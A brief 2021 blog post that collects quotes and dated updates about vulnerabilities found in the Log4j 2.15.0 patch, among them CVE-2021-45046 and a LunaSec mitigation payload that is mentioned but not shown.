Thursday, December 16, 2021

Log4j Fix Also Has RCE

Dan Goodin:

Now, researchers are reporting that there are at least two vulnerabilities in the patch, released as Log4J 2.15.0, and that attackers are actively exploiting one or both of them against real-world targets who have already applied the update.

LunaSec (via Hacker News):

After the log4j maintainers released version 2.15.0 to address the Log4Shell vulnerability, an additional attack vector was identified and reported in CVE-2021-45046.

Our research into this shows that this new CVE invalidates previous mitigations used to protect versions 2.7.0 <= Apache log4j <= 2.14.1 from Log4Shell in some cases.


We also wrote a Log4Shell payload that will in-memory “hot patch” your server against Log4Shell.


If you paste that into a vulnerable server (or even throw it into a log statement in your main function), that’ll patch you against this until you can manage to update properly.

See also: Bruce Schneier.


Update (2021-12-16): Rosyna Keller:

2.15.0 only had the DoS and data exfil bugs. 2.14.x and earlier have the RCE. 2.15.0 has no RCE. 2.16.0 fixes everything.

Update (2021-12-17): log4j-scan (via Rosyna Keller):

There is a patch bypass on Log4J v2.15.0 that allows a full RCE.

Comments RSS · Twitter

Leave a Comment